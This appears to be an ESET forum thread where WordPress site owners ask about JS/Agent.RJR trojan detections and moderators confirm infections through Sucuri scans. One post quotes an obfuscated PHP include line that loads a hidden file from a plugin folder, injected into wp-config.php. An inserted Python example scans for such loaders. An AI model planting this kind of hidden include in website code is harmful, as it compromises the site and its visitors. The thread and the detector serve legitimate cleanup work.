kichus, Posted January 27

The following WordPress website https://infinitumpartners.com.au/ is blocked by ESET with a JS.Agent.rjr trojan warning. It's only showing for users with ESET installed and loading fine for other website users. We have all the plugin and Core files up-to-date and have Security plugins installed. None of the internal scans are showing any malicious code present. Could you please help us locate the actual issue? It is critical as our business is affected. Thank you so much in advance.

Marcos (Administrators), Posted January 27

The website was compromised and contains the JS malware detected by ESET: https://sitecheck.sucuri.net/results/https/infinitumpartners.com.au

kichus (Author), Posted January 27

Thank you so much for your quick reply. We have seen this report already but are not seeing any traces of this code in the source code or in the DB. Could you please help us locate the code, and is it location-specific? Thank you in advance.

Marcos (Administrators), Posted January 27

Unfortunately we can't tell. We don't provide website cleaning and monitoring services nor have access to your web server and database. We merely scan the HTML code downloaded from the Internet.

kichus (Author), Posted January 27

Thank you. Appreciate your time.

itman, Posted January 27

> 40 minutes ago, Glassertje said:
> The website is working here. No warning.

Same here using Firefox. However, Sucuri detects web site injection. It could be that Eset Secure Browser mode for EIS and ESSP is blocking the code injection. It also appears to be an infected WordPress plug-in, http://infinitumpartners.com.au/wp-content/uploads/2021/11/OTP2-Dark-overlay-60.jpg?id=3552

Marcos (Administrators), Posted January 27

No detection now either. I recollect that the Sucuri scanner caches results for some time, i.e. it's still showing the malicious code even if it has been removed today.

MicroS, Posted January 29

Hi. On my website https://pgmprzemysl.pl ESET detects JS/Agent.RJR. I scanned the website on VirusTotal (https://www.virustotal.com/gui/url/a62fdc26b3fcd54a45a5d1a3e431f154fade046c29fdc57a70438839ec9f92d4) but the scanner shows that everything is clean. I found something like

    $r9 = "//wp\x2dcontent/plug\x69ns/dupl\x69cate\x2dpage/.e6da785f.ccss"; strpos($r9, 't5y'); @include_once /* p2bc */ ($r9);

in the index.php and wp-config.php files and I removed this, but JS/Agent.RJR is still detected somewhere. What else should I check?

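Added example (not part of the post above and not ESET or Sucuri code): a small Python check that finds other PHP files carrying the same kind of loader as the line quoted in the post, by decoding escape-encoded include paths and flagging includes that point at a dotfile. The function names and the `SAMPLE` text are assumptions made for this example; `SAMPLE` reuses the line from the post plus one constructed clean `require`.

```python
import re
from pathlib import Path

# include/require (optionally "@"-suppressed, optionally followed by a
# /* comment */) whose argument is a variable or a double-quoted string.
INCLUDE_RE = re.compile(
    r'@?\s*\b(?:include|require)(?:_once)?\b\s*(?:/\*.*?\*/\s*)?\(?\s*'
    r'(\$\w+|"(?:[^"\\]|\\.)*")', re.S)
ASSIGN_RE = re.compile(r'(\$\w+)\s*=\s*"((?:[^"\\]|\\.)*)"\s*;')
ESCAPE_RE = re.compile(r'\\x([0-9A-Fa-f]{1,2})|\\([0-7]{1,3})')

# Constructed sample: the line quoted in the post, then an ordinary require.
SAMPLE = r'''<?php
$r9 = "//wp\x2dcontent/plug\x69ns/dupl\x69cate\x2dpage/.e6da785f.ccss"; strpos($r9, 't5y'); @include_once /* p2bc */ ($r9);
require __DIR__ . '/wp-blog-header.php';
'''

def decode_php_escapes(s):
    """Decode the \\xHH and octal escapes PHP expands in double-quoted strings."""
    def repl(m):
        return chr(int(m.group(1), 16)) if m.group(1) else chr(int(m.group(2), 8) & 0xFF)
    return ESCAPE_RE.sub(repl, s)

def scan_php(text):
    """Return includes whose path literal is escape-encoded or names a dotfile."""
    assigned = dict(ASSIGN_RE.findall(text))
    findings = []
    for m in INCLUDE_RE.finditer(text):
        arg = m.group(1)
        raw = assigned.get(arg) if arg.startswith("$") else arg[1:-1]
        if raw is None:
            continue  # path is built at run time; needs manual review
        path = decode_php_escapes(raw)
        reasons = []
        if ESCAPE_RE.search(raw):
            reasons.append("escaped-path")
        if path.rsplit("/", 1)[-1].startswith("."):
            reasons.append("hidden-file")
        if reasons:
            findings.append({"path": path, "reasons": reasons})
    return findings

def scan_tree(root):
    """Scan every .php file under root and map relative file name to findings."""
    root, report = Path(root), {}
    for php in sorted(root.rglob("*.php")):
        hits = scan_php(php.read_text(errors="replace"))
        if hits:
            report[php.relative_to(root).as_posix()] = hits
    return report

if __name__ == "__main__":
    print(scan_php(SAMPLE))
```

Run `scan_tree` against a copy of the site's document root; each decoded path it reports is a file to inspect alongside the PHP file that includes it.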
Marcos (Administrators), Posted January 29

> 2 hours ago, MicroS said:
> What else should I check?

Please refer to https://sitecheck.sucuri.net/results/https/pgmprzemysl.pl.

itman, Posted January 29

> 24 minutes ago, Marcos said:
> Please refer to https://sitecheck.sucuri.net/results/https/pgmprzemysl.pl.

Sucuri is detecting Magento malware; namely malware.magento_shoplift.38.1. Refer to this article: https://labs.sucuri.net/signatures/sitecheck/malware-magento_shoplift-38-1/ .

kandrea, Posted January 30

Same here, on uphotelbudapest.com. We tried to find and delete the infected files, and now ESET doesn't block the website, but Sucuri still writes this:

Warning: Malware Detected
Infected with malware. Immediate action is required

What could we do?

Marcos (Administrators), Posted January 30

> 8 minutes ago, kandrea said:
> Same here, on uphotelbudapest.com. We tried to find and delete the infected files, and now ESET doesn't block the website, but Sucuri still writes this: Warning: Malware Detected Infected with malware. Immediate action is required

The website is indeed infected and needs to be cleaned: https://sitecheck.sucuri.net/results/uphotelbudapest.com

itman, Posted January 30

> 1 hour ago, Marcos said:
> The website is indeed infected and needs to be cleaned: https://sitecheck.sucuri.net/results/uphotelbudapest.com

Looks like the web site is no longer infected. Neither Sucuri nor Eset detects any malware.

Raxel, Posted January 31

Seems I'm getting the warning from https://www.lifelabs.com/ for agent.RJR. A bit scary, as it's a gateway to medical records. Any chance it's not a valid threat?

Marcos (Administrators), Posted January 31

> 5 hours ago, Raxel said:
> Seems I'm getting the warning from https://www.lifelabs.com/ for agent.RJR. A bit scary, as it's a gateway to medical records. Any chance it's not a valid threat?

The website is indeed infected:

Raxel, Posted January 31

> 7 hours ago, Marcos said:
> The website is indeed infected:

Thank you! That could be a bad one, for sure.

AmadeusConcept, Posted February 8

Hello,

The following WordPress website https://le-blog-des-leaders.com is blocked by ESET with a JS.Agent.rjr trojan warning. It's only showing for users with ESET installed and loading fine for other website users. We have all the plugin and Core files up-to-date and have Security plugins installed in WordPress. None of the internal scans are showing any malicious code present. Could you please help us locate the actual issue? It is critical as our business is affected. Thank you so much in advance.

Marcos (Administrators), Posted February 8

> 12 minutes ago, AmadeusConcept said:
> is blocked by ESET with a JS.Agent.rjr trojan warning. It's only showing for users with ESET installed and loading fine for other website users. We have all the plugin and Core files up-to-date and have Security plugins installed in WordPress.

The website is indeed infected: https://sitecheck.sucuri.net/results/https/le-blog-des-leaders.com

Bruno777, Posted February 9

We have the same problem on our website: https://aripar.org. Validated at https://sitecheck.sucuri.net/results/https/aripar.org there is no problem. Only blocked by ESET users.

Marcos (Administrators), Posted February 10

> 8 hours ago, Bruno777 said:
> We have the same problem on our website: https://aripar.org. Validated at https://sitecheck.sucuri.net/results/https/aripar.org there is no problem. Only blocked by ESET users.

The website is indeed infected: